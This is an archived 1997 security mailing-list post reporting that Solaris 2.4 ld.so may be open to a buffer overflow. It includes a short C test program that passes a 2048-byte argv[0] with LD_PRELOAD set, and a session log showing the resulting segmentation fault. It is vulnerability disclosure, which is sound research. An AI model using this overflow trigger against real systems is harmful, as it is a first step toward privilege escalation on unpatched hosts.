Solaris ld.so possibly vulnerable?

Dan Fleisher (dan@DIMSUM.TCH.HARVARD.EDU)
Fri, 18 Jul 1997 11:40:28 -0400

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Dan McGuirk: "Linux ld.so exploit"
Previous message: Michael Douglass: "ICMP ECHO_REQUESTS to BROADCAST addresses"
Next in thread: Illuminatus Primus: "Re: Solaris ld.so possibly vulnerable?"

Hi, here is the results of a test which indicate that Solaris (2.4 at
least) ld.so might be vulnerable to this overflow:
Script started on Fri Jul 18 11:22:08 1997
bash$ id
uid=2011(dan) gid=110(chnd)
bash$ uname -a
SunOS dimsum 5.4 Generic_101945-10 sun4m sparc
bash$ cat sot.c
main(int argc, char **argv)
{
char b[2048];
char err[] = "bad args\n";
char err2[] = "execl failed\n";

if(argc != 2) {
write(2, err, sizeof(err));
exit(1);
}

memset(b, 'A', sizeof(b));

putenv("LD_PRELOAD=foobar");

execl(argv[1], b, 0);
write(2, err2, sizeof(err2));
}

bash$ sot /bin/sh
Segmentation Fault (core dumped)
bash$ exit

script done on Fri Jul 18 11:22:47 1997

---
Dan Fleisher <dan@dimsum.tch.harvard.edu>

Next message: Dan McGuirk: "Linux ld.so exploit"
Previous message: Michael Douglass: "ICMP ECHO_REQUESTS to BROADCAST addresses"
Next in thread: Illuminatus Primus: "Re: Solaris ld.so possibly vulnerable?"